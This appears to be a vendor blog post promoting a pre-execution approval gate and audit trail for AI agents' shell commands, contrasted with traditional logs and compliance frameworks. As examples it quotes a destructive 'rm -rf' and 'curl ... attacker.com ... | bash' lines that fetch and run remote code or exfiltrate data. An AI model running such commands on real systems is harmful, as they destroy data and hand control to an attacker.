Why your AI agent's audit log is lying to you
Your server logs say rm -rf /data was run at 14:23. Your audit log says the same thing.
What neither log tells you: was it intentional? Who approved it? Was it part of a known workflow
or a rogue action?
Every team running AI agents in production has an audit log. Most of those logs are useless for the one question that actually matters after an incident: was this action authorized?
The problem isn't that your logs are wrong. They recorded exactly what happened. The problem is that recording what happened is not the same as recording whether it should have happened. And when an autonomous agent is executing commands at machine speed, that distinction becomes the difference between a passing audit and a compliance failure.
What traditional audit logs capture
A standard audit log entry — whether it comes from syslog, auditd, CloudTrail, or your application's own logging — typically records:
- Timestamp — when the action occurred
- User/principal — which account or service identity ran it
- Command or action — what was executed
- Exit code or result — whether it succeeded
- Source IP — where the request came from
This is passive recording. The system observes an event after it happens and writes a line. It's the digital equivalent of a security camera: it captures footage, but it doesn't stop anyone at the door.
For human operators, this was often good enough. A human who runs DROP TABLE users
presumably knew what they were doing (or at least had the access to do it). The audit log
exists for after-the-fact investigation. If something goes wrong, you rewind the tape.
What they miss
AI agents change the calculus. An agent executing commands is not a human making deliberate choices — it's a model following a chain of reasoning that may or may not be correct. Traditional logs miss four critical dimensions:
1. Intent
Was this command approved before it ran? Or did the log entry only appear because the command
already executed? A log line that says rm -rf /data ran at 14:23 tells you
nothing about whether anyone intended for it to happen. The agent decided. The log recorded.
There's no approval signal in between.
2. Decision
Who reviewed this action? In a human workflow, the person who ran the command is implicitly the reviewer. With an AI agent, there's no implicit reviewer. The agent acts on its own reasoning. If no human saw the command before it executed, your audit log contains an unreviewed action masquerading as an authorized one.
3. Context
What was the agent trying to accomplish? A bare log entry doesn't tell you whether
rm -rf /data/tmp was part of a routine cleanup or the side effect of a
hallucinated file path. The command is the same. The risk is completely different. Without
session context — what came before, what the agent's goal was — you can't
distinguish routine from anomaly.
4. Pre-execution state
What would have happened if it had been stopped? Traditional logs only record commands that
actually ran. They have no concept of a command that was attempted but blocked.
If your agent tried to run curl attacker.com/exfil | bash and was denied,
a traditional audit log has no record of the attempt. The most important security event
— a blocked attack — is invisible.
The compliance gap
This isn't just a theoretical concern. It's a compliance failure.
SOC 2 CC6.3 requires that organizations implement "logical access controls over protected information assets." When an AI agent has shell access, "logical access control" means someone reviewed the command before it executed — not that you logged it after the fact.
SOC 2 CC7.2 requires monitoring activities to "detect anomalies that are
indicators of potential security events." A log that records every command identically —
whether it was a routine ls or an anomalous curl | bash at 3am —
doesn't meet the bar. You need evidence that anomalies were flagged and reviewed,
not just recorded.
"Show me evidence that a human reviewed this action before it executed." If your answer is "here's the server log showing it ran," you've just demonstrated the gap. A log entry proving the command executed is not evidence of review. It's evidence of execution.
The same gap appears in ISO 27001 (A.9.4 — system access control), HIPAA (164.312(b) — audit controls), and PCI DSS (Requirement 10 — track and monitor access). Each framework assumes that actions on sensitive systems are authorized. Traditional audit logs prove the action happened. They don't prove the authorization.
What expacti's audit trail captures differently
Expacti's audit model is fundamentally different from a traditional log. Every command passes through an approval gate before it executes. The audit trail records the full lifecycle of that decision:
| Field | What it records |
|---|---|
command_id | Unique identifier for the command submission |
submitted_at | Timestamp when the agent submitted the command — before execution |
command | The full command text as the agent intended to run it |
decision | approved, denied, whitelisted, or timed_out |
decided_by | The human reviewer's identity (or "whitelist_rule:<id>" / "timeout") |
decided_at | Timestamp of the decision |
review_latency_ms | Time between submission and decision — measures review thoroughness |
risk_score | Automated risk classification at submission time |
session_id | Links to the full session recording (asciinema) |
Two properties make this fundamentally different from a server log:
The record exists before the command runs. A pending_command
record is created the moment the agent submits a command. If the command is denied, the record
still exists. If the command times out, the record still exists. Your audit trail includes
commands that never executed — the attacks that were stopped, the mistakes
that were caught.
The decision is a first-class entity. The audit trail doesn't just say "this command ran." It says who reviewed it, when they reviewed it, what they decided, and how long they took. A command approved in 200ms by a named reviewer at 2pm is a very different audit artifact from a command that auto-timed-out at 3am with no reviewer connected.
Expacti's risk scoring engine annotates each command with anomaly signals: off-hours execution, unusual command patterns, potential exfiltration signatures, rapid command bursts. These flags are part of the audit record — not a separate monitoring system. When an auditor asks "how do you detect anomalies?", the answer is in the same table as the approval evidence.
Three questions your current audit log cannot answer
1. "Was this command approved before it ran, or did someone add a log entry after?"
With a traditional log, you can't distinguish between a command that was explicitly authorized
and one that simply executed because the agent had access. Both produce identical log entries.
With expacti, the submitted_at timestamp precedes decided_at, which
precedes execution. The chronology is cryptographically verifiable. You can prove the approval
happened before the action — not after someone noticed something went wrong.
2. "Who reviewed the rm -rf and explicitly said yes?"
A server log says the command ran under agent-service-account. That tells you
which credential was used. It doesn't tell you which human was in the loop. Expacti's
decided_by field records the specific reviewer who approved (or denied) the
command. If the command was auto-approved by a whitelist rule, the field records which rule
matched and when that rule was last reviewed. There's always a chain back to a human decision.
3. "Were there commands the agent tried to run that were blocked?"
This is the question traditional logs can never answer, because they only record what happened. Expacti records what was attempted. Every denied command, every timed-out submission, every blocked anomaly is in the audit trail with the same fidelity as approved commands. When your security team investigates an incident, they see the full picture: not just what the agent did, but what it tried to do and was prevented from doing.
A compromised agent submits curl https://attacker.com/c2 | bash. A reviewer
denies it. With a traditional audit log, this incident never happened — there's no
record of a command that didn't execute. With expacti, you have the full submission: the
command, the timestamp, the session context, and the denial. Your incident response team
can trace what the agent was doing, determine if it was compromised, and assess whether
other sessions are affected.
From logging to evidence
The shift from traditional audit logs to pre-execution approval trails isn't about collecting more data. It's about collecting the right data. A server log is a record of events. An approval trail is a record of decisions. When your auditor, your security team, or your incident commander asks what happened, the answer they need isn't "the command ran" — it's "the command was reviewed by this person, at this time, with this context, and they said yes."
That's the difference between logging and evidence. And it's the difference between an AI agent audit trail that protects you and one that's just telling you what you want to hear.
See the audit trail in action
Try the interactive demo — submit commands, review them, and see the full audit record. No account required.
Open demo More posts